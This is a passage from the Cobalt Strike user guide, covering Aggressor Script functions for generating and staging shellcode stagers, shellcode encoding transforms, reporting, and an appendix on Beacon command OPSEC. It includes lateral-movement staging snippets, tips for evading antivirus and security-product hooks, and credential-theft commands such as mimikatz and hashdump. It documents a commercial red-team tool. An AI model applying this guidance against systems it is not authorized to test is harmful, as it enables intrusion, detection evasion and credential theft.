AggressorScript/Functions ssh_commands GetalistofSSHcommands. Returns AnarrayofSSHcommands. Example printAll(ssh_commands()); stager ReturnsthestagerforaspecificCobaltStrikelistener Arguments $1-thelistenername $2-x86|x64-thearchitectureofthestageroutput. Note Beawarethatnotalllistenerconfigurationshavex64stagers.Ifindoubt,usex86. Returns Ascalarcontainingshellcodeforthespecifiedlistener. Example $data = stager("my listener", "x86"); $handle = openf(">out.bin"); writeb($handle, $data); closef($handle); stager_bind_pipe CobaltStrikeUserGuide www.fortra.com page:434
AggressorScript/Functions Returnsabind_pipestagerforaspecificCobaltStrikelistener.Thisstagerissuitableforusein lateralmovementactionsthatbenefitfromasmallnamedpipestager.Stagewith&beacon_ stage_pipe. Arguments $1-thelistenername Returns Ascalarcontainingx86bind_pipeshellcode. Example
step 1. generate our stager
$stager = stager_bind_pipe("my listener");
step 2. do something to run our stager
step 3. stage a payload via this stager
beacon_stage_pipe($bid, $target, "my listener", "x86");
step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener"); Seealso &artifact_general stager_bind_tcp Returnsabind_tcpstagerforaspecificCobaltStrikelistener.Thisstagerissuitableforusein localhost-onlyactionsthatrequireasmallstager.Stagewith&beacon_stage_tcp. Arguments $1-thelistenername $2-x86|x64-thearchitectureofthestageroutput. $3-theporttobindto CobaltStrikeUserGuide www.fortra.com page:435
AggressorScript/Functions Returns Ascalarcontainingbind_tcpshellcode Example
step 1. generate our stager
$stager = stager_bind_tcp("my listener", "x86", 1234);
step 2. do something to run our stager
step 3. stage a payload via this stager
beacon_stage_tcp($bid, $target, 1234, "my listener", "x86");
step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener"); Seealso &artifact_general str_chunk Chunkastringintomultipleparts Arguments $1-thestringtochunk $2-themaximumsizeofeachchunk Returns Theoriginalstringsplitintomultiplechunks Example
hint... :)
else if ($1 eq "template.x86.ps1") { local('$enc'); $enc = str_chunk(base64_encode($2), 61); CobaltStrikeUserGuide www.fortra.com page:436
AggressorScript/Functions return strrep($data, '%%DATA%%', join("' + '", $enc)); } str_decode Convertastringofbytestotextwiththespecifiedencoding. Arguments $1-thestringtodecode $2-theencodingtouse. Returns Thedecodedtext. Example
convert back to a string we can use (from UTF16-LE)
$text = str_decode($string, "UTF16-LE"); str_encode Converttexttobytestringwiththespecifiedcharacterencoding. Arguments $1-thestringtoencode $2-theencodingtouse Returns Theresultingstring. Example
convert to UTF16-LE
$encoded = str_encode("this is some text", "UTF16-LE"); CobaltStrikeUserGuide www.fortra.com page:437
AggressorScript/Functions str_xor WalkastringandXOR itwiththeprovidedkey. Arguments $1-thestringtomask $2-thekeytouse(string) Returns Theoriginalstringmaskedwiththespecifiedkey. Example $mask = str_xor("This is a string", "key"); $plain = str_xor($mask, "key"); sync_download Syncadownloadedfile(View->Downloads)toalocalpath. Arguments $1-theremotepathtothefiletosync.See&downloads $2-wheretosavethefilelocally $3-(optional)acallbackfunctiontoexecutewhendownloadissynced.Thefirstargumentto thisfunctionisthelocalpathofthedownloadedfile. Example
sync all downloads
command ga { local('$download $lpath $name $count'); foreach $count => $download (downloads()) { ($lpath, $name) = values($download, @("lpath", "name")); sync_download($lpath, script_resource("file $+ .$count"), lambda({ println("Downloaded $1 [ $+ $name $+ ]"); CobaltStrikeUserGuide www.fortra.com page:438
AggressorScript/Functions }, $name)); } } targets ReturnsalistofhostinformationinCobaltStrike'sdatamodel. Returns Anarrayofdictionaryobjectswithinformationabouteachhost. Example printAll(targets()); tbrowser GeneratethetargetbrowserGUIcomponent. Returns ThetargetbrowserGUIobject(ajavax.swing.JComponent) Example addVisualization("Target Browser", tbrowser()); Seealso &showVisualization tokenToEmail Covertaphishingtokentoanemailaddress. Arguments $1-thephishingtoken CobaltStrikeUserGuide www.fortra.com page:439
AggressorScript/Functions Returns Theemailaddressor"unknown"ifthetokenisnotassociatedwithanemail. Example set PROFILER_HIT { local('$out $app $ver $email'); $email = tokenToEmail($5); $out = "\c9[+]\o $1 $+ / $+ $2 [ $+ $email $+ ] Applications"; foreach $app => $ver ($4) { $out .= "\n\t $+ $[25]app $ver"; } return "$out $+ \n\n"; } transform Transformshellcodeintoanotherformat. Arguments $1-theshellcodetotransform $2-thetransformtoapply Type Description array commaseparatedbytevalues hex Hex-encodethevalue powershell-base64 PowerShell.exe-friendlybase64encoder vba aVBAarray()withnewlinesaddedin vbs aVBSexpressionthatresultsinastring veil Veil-readystring(\x##\x##) Returns Theshellcodeafterthespecifiedtransformisapplied Example CobaltStrikeUserGuide www.fortra.com page:440
AggressorScript/Functions println(transform("This is a test!", "veil")); transform_vbs TransformshellcodeintoaVBSexpressionthatresultsinastring Arguments $1-theshellcodetotransform $2-themaximumlengthofaplaintextrun Notes l Previously,CobaltStrikewouldembeditsstagersintoVBSfilesasseveralChr()calls concatenatedintoastring. l CobaltStrike3.9introducedfeaturesthatrequiredlargerstagers.Theselargerstagers weretoobigtoembedintoaVBSfilewiththeabovemethod. l TogetpastthisVBSlimitation,CobaltStrikeoptedtouseChr()callsfornon-ASCII dataandrunsofdouble-quotedstringsforprintablecharacters. l Thischange,anengineeringnecessity,unintentionallydefeatedstaticanti-virus signaturesforCobaltStrike'sdefaultVBSartifactsatthattime. l Ifyou'relookingforaneasyevasionbenefitwithVBSartifacts,consideradjustingthe plaintextrunlengthinyourResourceKit. Returns Theshellcodeafterthistransformisapplied Example println(transform_vbs("This is a test!", "3")); tstamp Formatatimeintoadate/timevalue.Thisvaluedoesnotincludeseconds. Arguments $1-thetime[millisecondssincetheUNIXepoch] CobaltStrikeUserGuide www.fortra.com page:441
AggressorScript/Functions Example println("The time is now: " . tstamp(ticks())); Seealso &dstamp unbind Removeakeyboardshortcutbinding. Arguments $1-thekeyboardshortcut Example
restore default behavior of Ctrl+Left and Ctrl+Right
unbind("Ctrl+Left"); unbind("Ctrl+Right"); Seealso &bind url_open OpenaURLinthedefaultbrowser. Arguments $1-theURLtoopen Example CobaltStrikeUserGuide www.fortra.com page:442
AggressorScript/Functions command go { url_open("https://www.cobaltstrike.com/"); } users Returnsalistofusersconnectedtothisteamserver. Returns Anarrayofusers. Example foreach $user (users()) { println($user); } vpn_interface_info GetinformationaboutaVPNinterface. Arguments $1-theinterfacename $2-[Optional]thekeytoextractavaluefor Returns %info = vpn_interface_info("interface"); Returnsadictionarywiththemetadataforthisinterface. $value = vpn_interface_info("interface", "key"); Returnsthevalueforthespecifiedkeyfromthisinterface'smetadata Example CobaltStrikeUserGuide www.fortra.com page:443
AggressorScript/Functions
create a script console alias to interface info
command interface { println("Interface $1"); foreach $key => $value (vpn_interface_info($1)) { println("$[15]key $value"); } } vpn_interfaces ReturnalistofVPNinterfacenames Returns Anarrayofinterfacenames. Example printAll(vpn_interfaces()); vpn_tap_create CreateaCovertVPNinterfaceontheteamserversystem. Arguments $1-theinterfacename(e.g.,phear0) $2-theMACaddress($nullwillmakearandomMACaddress) $3-reserved;use$nullfornow. $4-theporttobindtheVPN'schannelto $5-thetypeofchannel[bind,http,icmp,reverse,udp] Example vpn_tap_create("phear0", $null, $null, 7324, "udp"); vpn_tap_delete CobaltStrikeUserGuide www.fortra.com page:444
AggressorScript/PopupHooks DestroyaCovertVPNinterface Arguments $1-theinterfacename(e.g.,phear0) Example vpn_tap_destroy("phear0"); Popup Hooks ThefollowingpopuphooksareavailableinCobaltStrike: Hook Where Arguments aggressor Cobalt StrikeMenu attacks AttacksMenu beacon [session] $1=selectedbeaconIDs(array) beacon_top [session] $1=selectedbeaconIDs(array) beacon_bottom [session] $1=selectedbeaconIDs(array) credentials CredentialBrowser $1=selectedcredentialrows(arrayof hashes) filebrowser [fileinfilebrowser] $1=beaconID,$2=folder,$3=selected files(array) help HelpMenu listeners Listenerstable $1=selectedlistenernames(array) pgraph [pivotgraph] processbrowser ProcessBrowser $1=BeaconID,$2=selectedprocesses (array) processbrowser_ Multi-SessionProcess $1=selectedprocesses(array) multi Browser reporting ReportingMenu ssh [SSHsession] $1=selectedsessionIDs(array) CobaltStrikeUserGuide www.fortra.com page:445
AggressorScript/Report-OnlyFunctions Hook Where Arguments targets [host] $1=selectedhosts(array) targets_other [host] $1=selectedhosts(array) view ViewMenu Report-Only Functions ThesefunctionsapplytoCobaltStrike'scustomreportcapabilityonly. agApplications Pullinformationfromtheapplicationsmodel. Arguments $1-themodeltopullthisinformationfrom. Returns Anarrayofdictionaryobjectsthatdescribeseachentryintheapplicationsmodel. Example printAll(agApplications($model)); agC2info Pullinformationfromthec2infomodel. Arguments $1-themodeltopullthisinformationfrom. Returns Anarrayofdictionaryobjectsthatdescribeseachentryinthec2infomodel. CobaltStrikeUserGuide www.fortra.com page:446
AggressorScript/Report-OnlyFunctions Example printAll(agC2Info($model)); agCredentials Pullinformationfromthecredentialsmodel Arguments $1-themodeltopullthisinformationfrom. Returns Anarrayofdictionaryobjectsthatdescribeseachentryinthecredentialsmodel. Example printAll(agCredentials($model)); agServices Pullinformationfromtheservicesmodel Arguments $1-themodeltopullthisinformationfrom. Returns Anarrayofdictionaryobjectsthatdescribeseachentryintheservicesmodel. Example printAll(agServices($model)); agSessions Pullinformationfromthesessionsmodel CobaltStrikeUserGuide www.fortra.com page:447
AggressorScript/Report-OnlyFunctions Arguments $1-themodeltopullthisinformationfrom. Returns Anarrayofdictionaryobjectsthatdescribeseachentryinthesessionsmodel. Example printAll(agSessions($model)); agTargets Pullinformationfromthetargetsmodel. Arguments $1-themodeltopullthisinformationfrom. Returns Anarrayofdictionaryobjectsthatdescribeseachentryinthetargetsmodel. Example printAll(agTargets($model)); agTokens Pullinformationfromthephishingtokensmodel. Arguments $1-themodeltopullthisinformationfrom. Returns Anarrayofdictionaryobjectsthatdescribeseachentryinthephishingtokensmodel. CobaltStrikeUserGuide www.fortra.com page:448
AggressorScript/Report-OnlyFunctions Example printAll(agTokens($model)); attack_describe MapsaMITREATT&CKtacticIDtoitslongerdescription. Returns Thefulldescriptionofthetactic Example println(attack_describe("T1134")); attack_detect MapsaMITREATT&CKtacticIDtoitsdetectionstrategy Returns Thedetectionstrategyforthistactic. Example println(attack_detect("T1134")); attack_mitigate MapsaMITREATT&CKtacticIDtoitsmitigationstrategy Returns Themitigationstrategyforthistactic. Example println(attack_mitigate("T1134")); CobaltStrikeUserGuide www.fortra.com page:449
AggressorScript/Report-OnlyFunctions attack_name MapsaMITREATT&CKtacticIDtoitsshortname. Returns Thenameorshortdescriptionofthetactic. Example println(attack_name("T1134")); attack_tactics AnarrayofMITREATT&CKtacticsknowntoCobaltStrike. https://attack.mitre.org Returns AnarrayoftacticIDs(e.g.,T1001,T1002,etc.). Example printAll(attack_tactics()); attack_url MapsaMITREATT&CKtacticIDtotheURLwhereyoucanlearnmore. Returns TheURLassociatedwiththistactic. Example println(attack_url("T1134")); bookmark CobaltStrikeUserGuide www.fortra.com page:450
AggressorScript/Report-OnlyFunctions Defineabookmark[PDFdocumentonly] Arguments $1-Thebookmarktodefine[mustbethesameas&h1or&h2title]. $2-(Optional)Defineachildbookmark[mustbethesameas&h1or&h2title]. Example
build out a document structure
h1("First"); h2("Child #1"); h2("Child #2");
define bookmarks for it
bookmark("First"); bookmark("First", "Child #1"); bookmark("First", "Child #2"); br Printaline-break. Example br(); describe Setadescriptionforareport. Arguments $1-Thereporttosetadefaultdescriptionfor. $2-Thedefaultdescription Example CobaltStrikeUserGuide www.fortra.com page:451
AggressorScript/Report-OnlyFunctions describe("Foo Report", "This report is about my foo"); report "Foo Report" {
yada yada yada...
} h1 Printsatitleheading. Arguments $1-theheadingtoprint. Example h1("I am the title"); h2 Printsasub-titleheading. Arguments $1-thetexttoprint. Example h2("I am the sub-title"); h3 Printsasub-sub-titleheading. Arguments $1-thetexttoprint. Example CobaltStrikeUserGuide www.fortra.com page:452
AggressorScript/Report-OnlyFunctions h3("I am not important."); h4 Printsasub-sub-sub-titleheading. Arguments $1-thetexttoprint. Example h4("I am really not important."); kvtable Printsatablewithkey/valuepairs. Arguments $1-adictionarywithkey/valuepairstoprint. Example
use an ordered-hash to preserve order
$table = ohash(); $table["#1"] = "first"; $table["#2"] = "second"; $table["#3"] = "third"; kvtable($table); landscape Changestheorientationofthisdocumenttolandscape. Example landscape(); CobaltStrikeUserGuide www.fortra.com page:453
AggressorScript/Report-OnlyFunctions layout Printsatablewithnobordersandnocolumnheaders. Arguments $1-anarraywithcolumnnames $2-anarraywithwidthvaluesforeachcolumn $3-anarraywithadictionaryobjectforeachrow.Thedictionaryshouldhavekeysthat correspondtoeachcolumn. Example @cols = @("First", "Second", "Third"); @widths = @("2in", "2in", "auto"); @rows = @( %(First => "a", Second => "b", Third => "c"), %(First => "1", Second => "2", Third => "3")); layout(@cols, @widths, @rows); list_unordered Printsanunorderedlist Arguments $1-anarraywithindividualbulletpoints. Example @list = @("apple", "bat", "cat"); list_unordered(@list); nobreak Groupreportelementstogetherwithoutalinebreak. Arguments CobaltStrikeUserGuide www.fortra.com page:454
AggressorScript/Report-OnlyFunctions $1-thefunctionwithreportelementstogrouptogether. Example
keep this stuff on the same page...
nobreak({ h2("I am the sub-title"); p("I am the initial information"); }) output Printelementsagainstagreybackdrop.Line-breaksarepreserved. Arguments $1-thefunctionwithreportelementstogroupasoutput. Example output({ p("This is line 1 and this is line 2."); }); p Printsaparagraphoftext. Arguments $1-thetexttoprint. Example p("I am some text!"); p_formatted Printsaparagraphoftextwithsomeformatpreservation. CobaltStrikeUserGuide www.fortra.com page:455
AggressorScript/Report-OnlyFunctions Arguments $1-thetexttoprint. TheFormatMarkup 1.Thisfunctionpreservesnewlines 2.Youmayspecifybulletedlists:
- I am item 1
- I am item 2
- etc. 3.Youmayspecifyaheading ===I am a heading=== Example p_formatted("===Hello World===\n\nThis is some text.\nI am on a new line\nAnd, I am:\n* Cool\n* Awesome\n* A bulleted list"); table Printsatable Arguments $1-anarraywithcolumnnames $2-anarraywithwidthvaluesforeachcolumn $3-anarraywithadictionaryobjectforeachrow.Thedictionaryshouldhavekeysthat correspondtoeachcolumn. Example @cols = @("First", "Second", "Third"); @widths = @("2in", "2in", "auto"); @rows = @( CobaltStrikeUserGuide www.fortra.com page:456
AggressorScript/Report-OnlyFunctions %(First => "a", Second => "b", Third => "c"), %(First => "1", Second => "2", Third => "3")); table(@cols, @widths, @rows); ts Printsatime/datestampinitalics. Example ts(); CobaltStrikeUserGuide www.fortra.com page:457
ReportingandLogging/Logging Reporting and Logging Logging CobaltStrikelogsallofitsactivityontheteamserver.Theselogsarelocatedinthelogs/ folder inthesamedirectoryyoustartedyourteamserverfrom.AllBeaconactivityisloggedherewith adateandtimestamp. Reports CobaltStrikehasseveralreportoptionstohelpmakesenseofyourdataandconveyastoryto yourclients.Youmayconfigurethetitle,description,andhostsdisplayedinmostreports. GototheReporting menu andchooseoneofthereportstogenerate.CobaltStrikewillexport yourreportasanMSWordorPDFdocument. figure77-ExportReportDialog Activity Report CobaltStrikeUserGuide www.fortra.com page:458
ReportingandLogging/Reports Theactivityreportprovidesatimelineofredteamactivities.Eachofyourpost-exploitation activitiesaredocumentedhere. figure78-TheActivityReport Hosts Report ThehostsreportsummarizesinformationcollectedbyCobaltStrikeonahost-by-hostbasis. Services,credentials,andsessionsarelistedhereaswell. CobaltStrikeUserGuide www.fortra.com page:459
ReportingandLogging/Reports figure79-TheHostsReport Indicators of Compromise ThisreportresemblesanIndicatorsofCompromiseappendixfromathreatintelligencereport. ContentincludesageneratedanalysisofyourMalleableC2profile,whichdomainyouused,and MD5hashesforfilesyou’veuploaded. CobaltStrikeUserGuide www.fortra.com page:460
ReportingandLogging/Reports figure80-IndicatorsofCompromiseReport Sessions Report Thisreportdocumentsindicatorsandactivityonasession-by-sessionbasis.Thisreport includes:thecommunicationpatheachsessionusedtoreachyou,MD5hashesoffilesputon diskduringthatsession,miscellaneousindicators(e.g.,servicenames),andatimelineofpost- exploitationactivity.Thisreportisafantastictooltohelpanetworkdefenseteamunderstandall ofred’sactivityandmatchtheirsensorstoyouractivity. CobaltStrikeUserGuide www.fortra.com page:461
ReportingandLogging/Reports figure81-TheSessionsReport Social Engineering Thesocialengineeringreportdocumentseachroundofspearphishingemails,whoclicked,and whatwascollectedfromeachuserthatclicked.Thisreportalsoshowsapplicationsdiscovered bythesystemprofiler. CobaltStrikeUserGuide www.fortra.com page:462
ReportingandLogging/CustomLogoinReports figure82-TheSocialEngineeringReport Tactics, Techniques, and Procedures ThisreportmapsyourCobaltStrikeactionstotacticswithinMITRE’sATT&CKMatrix.The ATT&CKmatrixdescribeseachtacticwithdetectionandmitigationstrategies.Youmaylearn moreaboutMITRE’sATT&CKat:https://attack.mitre.org/ Custom Logo in Reports CobaltStrikereportsdisplayaCobaltStrikelogoatthetopofthefirstpage.Youmayreplace thiswithanimageofyourchoosing.GotoCobalt Strike ->Preferences ->Reporting . CobaltStrikeUserGuide www.fortra.com page:463
ReportingandLogging/CustomReports figure83-Preferences Yourcustomimageshouldbe1192x257pxsetto300dpi.The300dpisettingisnecessaryfor thereportingenginetorenderyourimageattherightsize. Youmayalsosetanaccentcolor.Thisaccentcoloristhecolorofthethicklinebelowyour imageonthefirstpageofthereport.Linksinsidereportsusetheaccentcolortoo. figure84-ACustomizedReport Custom Reports CobaltStrikeUserGuide www.fortra.com page:464
ReportingandLogging/CustomReports CobaltStrikeusesadomainspecificlanguagetodefineitsreports.Youmayloadyourown reportsthroughtheReport Preferencesdialog.Tolearnmoreaboutthisfeature,consultthe CustomReportschapteroftheAggressorScriptdocumentation. CobaltStrikeUserGuide www.fortra.com page:465
Appendix/ KeyboardShortcuts Appendix Keyboard Shortcuts Thefollowingkeyboardshortcutsareavailable. Shortcut Where Action Ctrl+A console selectalltext Ctrl+F console openfindtooltosearchtheconsole Ctrl+K console cleartheconsole Ctrl+Minus console decreasefontsize Ctrl+Plus console increasefontsize Ctrl+0 console resetfontsize Down console shownextcommandincommandhistory Escape console cleareditbox PageDown console scrolldownhalfascreen PageUp console scrolluphalfascreen Tab console completethecurrentcommand(insomeconsoletypes) Up console showpreviouscommandincommandhistory Ctrl+B everywhere sendcurrenttabtothebottomoftheCobaltStrikewindow Ctrl+D everywhere closecurrenttab Ctrl+Shift+D everywhere closealltabsexceptthecurrenttab Ctrl+E everywhere emptythebottomoftheCobaltStrikewindow(undoCtrl+B) Ctrl+I everywhere chooseasessiontointeractwith Ctrl+Left everywhere switchtoprevioustab Ctrl+O everywhere openpreferences Ctrl+R everywhere Renamethecurrenttab Ctrl+Right everywhere switchtonexttab Ctrl+T everywhere takescreenshotofcurrenttab(resultissenttoteamserver) Ctrl+Shift+T everywhere takescreenshotofCobaltStrike(resultissenttoteam server) CobaltStrikeUserGuide www.fortra.com page:466
Appendix/BeaconCommandBehaviorandOPSECConsiderations Shortcut Where Action Ctrl+W everywhere opencurrenttabinitsownwindow Ctrl+C graph arrangesessionsinacircle Ctrl+H graph arrangesessionsinahierarchy Ctrl+Minus graph zoomout Ctrl+P graph saveapictureofthegraphdisplay Ctrl+Plus graph zoomin Ctrl+S graph arrangesessionsinastack Ctrl+0 graph resettodefaultzoom-level Ctrl+F tables openfindtooltofiltertablecontent Ctrl+A targets selectallhosts Escape targets clearselectedhosts TIP: ThefulllistofDefaultKeyboardShortcutsareavailablefromthemenu(Help -> Default Keyboard Shortcuts). Beacon Command Behavior and OPSEC Considerations Agoodoperatorknowstheirtoolsandhasanideaofhowthetoolisaccomplishingits objectivesontheirbehalf.ThisdocumentsurveysBeacon'scommandsandprovides backgroundonwhichcommandsinjectintoremoteprocesses,whichcommandsspawnjobs, andwhichcommandsrelyoncmd.exeorpowershell.exe. API-only ThefollowingcommandsarebuiltintoBeaconandrelyonWin32APIstomeettheirobjectives: cd cp connect download drives exit getprivs getuid inline-execute CobaltStrikeUserGuide www.fortra.com page:467
Appendix/BeaconCommandBehaviorandOPSECConsiderations jobkill kill link ls make_token mkdir mv ps pwd rev2self rm rportfwd rportfwd_local setenv socks steal_token unlink upload House-keeping Commands ThefollowingcommandsarebuiltintoBeaconandexisttoconfigureBeaconorperformhouse- keepingactions.Someofthesecommands(e.g.,clear,downloads,help,mode,note)donot generateataskforBeacontoexecute. argue blockdlls cancel checkin clear downloads help jobs modedns modedns-txt modedns6 note powershell-import ppid sleep socksstop spawnto Inline Execute (BOF) CobaltStrikeUserGuide www.fortra.com page:468
Appendix/BeaconCommandBehaviorandOPSECConsiderations ThefollowingcommandsareimplementedasinternalBeaconObjectFiles.ABeaconObject FileisacompiledCprogram,writtentoacertainconvention,thatexecuteswithinaBeacon session.Thecapabilityiscleanedupafteritfinishesrunning. dllload elevatesvc-exe elevateuac-token-duplication getsystem jumppsexec jumppsexec64 jumppsexec_psh kerberos_ccache_use kerberos_ticket_purge kerberos_ticket_use netdomain regquery regqueryv remote-execpsexec remote-execwmi runasadminuac-cmstplua runasadminuac-token-duplication timestomp ThenetworkinterfaceresolutionwithinboththeportscanandcovertvpndialogsusesaBeacon ObjectFileaswell. OPSECAdvice ThememoryforBeaconObjectFilesiscontrolledwithsettingsfromtheMalleableC2’s process-injectblock. Post-Exploitation Jobs (Fork&Run) ManyBeaconpost-exploitationfeaturesspawnaprocessandinjectacapabilityintothat process.Somepeoplecallthispatternfork&run.Beacondoesthisforanumberofreasons:(i) thisprotectstheagentifthecapabilitycrashes.(ii)historically,thisschememakesitseamless foranx86Beacontolaunchx64post-exploitationtasks.ThiswascriticalasBeacondidn'thave anx64builduntil2016.(iii)Somefeaturescantargetaspecificremoteprocess.Thisallowsthe post-exactiontooccurwithindifferentcontextswithouttheneedtomigrateorspawna payloadinthatothercontext.And(iv)thisdesigndecisionkeepsalotofclutter(threads, suspiciouscontent)generatedbyyourpost-exactionoutofyourBeaconprocessspace.Here arethefeaturesthatusethispattern: Fork&RunOnly CobaltStrikeUserGuide www.fortra.com page:469
Appendix/BeaconCommandBehaviorandOPSECConsiderations covertvpn execute-assembly powerpick TargetExplicitProcessOnly browserpivot psinject Fork&RunorTargetExplicitProcess chromedump dcsync desktop hashdump keylogger logonpasswords mimikatz net* portscan printscreen pth screenshot screenwatch ssh ssh-key OPSECAdvice UsethespawntocommandtochangetheprocessBeaconwilllaunchforitspost-exploitation jobs.Thedefaultisrundll32.exe(youprobablydon’twantthat).Theppidcommandwillchange theparentprocessthesejobsarerununderaswell.Theblockdllscommandwillstopuserland hookingforsomesecurityproducts.MalleableC2'sprocess-injectblockgivesalotofcontrol overtheprocessinjectionprocess.MalleableC2'spost-exblockhasseveralOPSECoptionsfor thesepost-exDLLsthemselves.Forfeaturesthathaveanexplicitinjectionoption,consider injectingintoyourcurrentBeaconprocess.CobaltStrikedetectsandactsonself-injection differentfromremoteinjection. Explicitinjectionwillnotcleanupanymemoryafterthepost-exploitationjobhascompleted.The recommendationistoinjectintoaprocessthatcanbesafelyterminatedbyyoutocleanupin- memoryartifacts. Process Execution CobaltStrikeUserGuide www.fortra.com page:470
Appendix/BeaconCommandBehaviorandOPSECConsiderations Thesecommandsspawnanewprocess: execute run runas runu OPSECAdvice Theppidcommandwillchangetheparentprocessofcommandsrunbyexecute.Theppid commanddoesnotaffectrunasorrunu. Process Execution (cmd.exe) Theshellcommanddependsoncmd.exe.Useruntorunacommandandgetoutputwithout cmd.exe Thepthcommandreliesoncmd.exetopassatokentoBeaconviaanamedpipe.The commandpatterntopassthistokenisanindicatorsomehost-basedsecurityproductslookfor. ReadHowtoPass-the-HashwithMimikatzforinstructionsonhowtodothismanually. Process Execution (powershell.exe) Thefollowingcommandslaunchpowershell.exetoperformsometaskonyourbehalf. jump winrm jumpwinrm64 powershell remote-execwinrm OPSECAdvice Usetheppidcommandtochangetheparentprocesspowershell.exeisrununder.Usethe POWERSHELL_COMMANDAggressorScripthooktochangetheformatofthePowerShell commandanditsarguments.Thejump winrm,jump winrm64,andpowershell[whenascript isimported]commandsdealwithPowerShellcontentthatistoolargetofitinasingle command-line.Togetaroundthis,thesefeatureshostascriptonaself-containedwebserver withinyourBeaconsession.UsethePOWERSHELL_DOWNLOAD_CRADLEAggressorScript hooktoshapethedownloadcradleusedtodownloadthesescripts. Process Injection (Remote) CobaltStrikeUserGuide www.fortra.com page:471
Appendix/BeaconCommandBehaviorandOPSECConsiderations Thepost-exploitationjobcommands(previouslymentioned)relyonprocessinjectiontoo.The othercommandsthatinjectintoaremoteprocessare: dllinject dllload inject shinject OPSECAdvice MalleableC2'sprocess-injectblockblockgivesalotofcontrolovertheprocessinjection process.Whenbeaconexitsaninjectedprocessitwillnotcleanitselffrommemoryandwillno longerbemaskedwhenthestage.sleep_maskissettotrue.Withthe4.5releasemostofthe heapmemorywillbeclearedandreleased.Recommendationistonotexitbeaconifyoudonot wanttoleavememoryartifactsunmaskedduringyourengagement.Whenyourengagementis doneitisrecommendedtorebootallofthetargetedsystemstoremoveanylingeringin- memoryartifacts. Process Injection (Spawn&Inject) Thesecommandsspawnatemporaryprocessandinjectapayloadorshellcodeintoit: elevateuac-token-duplication shspawn spawn spawnas spawnu spunnel spunnel_local OPSECAdvice Usethespawntocommandtosetthetemporaryprocesstouse.Theppidcommandsetsa parentprocessformostofthesecommands.Theblockdllscommandwillblockuserland hooksfromsomesecurityproducts.MalleableC2'sprocess-injectblockgivesalotofcontrol overtheprocessinjectionprocess.MalleableC2'spost-exblockprovidesoptionstoadjust Beacon'sin-memoryevasionoptions. Service Creation ThefollowinginternalBeaconcommandscreateaservice(eitheronthecurrenthostora remotetarget)torunacommand.ThesecommandsuseWin32APIstocreateandmanipulate services. CobaltStrikeUserGuide www.fortra.com page:472
Appendix/UnicodeSupport elevatesvc-exe jumppsexec jumppsexec64 jumppsexec_psh remote-execpsexec OPSECAdvice Thesecommandsuseaservicenamethatconsistsofrandomlettersandnumbersbydefault. TheAggressorScriptPSEXEC_SERVICEhookallowsyoutochangethisbehavior.Eachofthese commands(exceptingjumppsexec_pshandremote-execpsexec)generateaserviceEXEand uploadittothetarget.CobaltStrike'sbuilt-inserviceEXEspawnsrundll32.exe[withno arguments],injectsapayloadintoit,andexits.Thisisdonetoallowimmediatecleanupofthe executable.UsetheArtifactKittochangethecontentandbehaviorsofthegeneratedEXE. Unicode Support Unicodeisamapofcharactersintheworld'slanguagestoafixednumberorcode-point.This documentcoversCobaltStrike'ssupportforUnicodetext. Encodings Unicodeisamapofcharacterstonumbers(code-points),butitisnotanencoding.Anencoding isaconsistentwaytoassignmeaningtoindividualorbytesequencesbymappingthemto code-pointswithinthismap. Internally,Javaapplications,storeandmanipulatecharacterswiththeUTF-16encoding.UTF- 16isanencodingthatusestwobytestorepresentcommoncharacters.Rarercharactersare representedwithfourbytes.CobaltStrikeisaJavaapplicationandinternally,CobaltStrikeis capableofstorage,manipulation,anddisplayoftextintheworld'svariouswritingsystems. There'snorealtechnicalbarriertothisinthecoreJavaplatform. IntheWindowsworld,thingsarealittledifferent.TheoptionsinWindowstorepresent charactersdateallthewaybacktotheDOSdays.DOSprogramsworkwithASCIItextandthose beautifulboxdrawingcharacters.Acommonencodingtomapnumbers0-127toUSASCIIand 128-255tothosebeautifulboxdrawingcharactershasaname.It'scodepage437.Thereare severalvariationsofcodepage437thatmixthebeautifulboxdrawingcharacterswith charactersfromspecificlanguages.ThiscollectionofencodingsisknownasanOEMencoding. Today,eachWindowsinstancehasaglobalOEMencodingsetting.Thissettingdictateshowto interprettheoutputofbyteswrittentoaconsolebyaprogram.Tointerprettheoutputof cmd.exeproperly,it'simportanttoknowthetarget'sOEMencoding. CobaltStrikeUserGuide www.fortra.com page:473
Appendix/UnicodeSupport Thefuncontinuesthough.TheboxdrawingcharactersareneededbyDOSprograms,butnot necessarilyWindowsprograms.So,withthat,WindowshastheconceptofanANSIencoding. It'saglobalsetting,liketheOEMencoding.TheANSIencodingdictateshowANSIWin32APIs willmapasequenceofbytestocode-points.TheANSIencodingforalanguageforgoesthe beautifulboxdrawingcharactersforcharactersusefulinthelanguagethatencodingis designedfor.Anencodingisnotnecessarilyconfinedtomappingonebytetoonecharacter.A variable-lengthencodingmayrepresentthemostcommoncharactersasasinglebyteandthen representothersassomemulti-bytesequence. ANSIencodingsarenotthefullstorythough.TheWindowsAPIsoftenhavebothANSIand Unicodevariants.AnANSIvariantofanAPIacceptsandinterpretsatextargumentasdescribed above.AUnicodeWin32APIexpectstextargumentsthatareencodedwithUTF-16. InWindows,therearemultipleencodingsituationspossible.There'sOEMencodingwhichcan representsometextinthetarget'sconfiguredlanguage.There'sANSIencodingwhichcan representmoretext,primarilyinthetarget'sconfiguredlanguage.And,there'sUTF-16which cancontainanycode-point.There'salsoUTF-8whichisavariable-lengthencodingthat'sspace efficientforASCIItext,butcancontainanycode-pointtoo. Beacon CobaltStrike'sBeaconreportsthetarget'sANSIandOEMencodingsaspartofitssession metadata.CobaltStrikeusesthesevaluestoencodetextinput,asneeded,tothetarget's encoding.CobaltStrikealsousesthesevaluestodecodetextoutput,asneeded,withthe target'sencoding. CobaltStrikeUserGuide www.fortra.com page:474
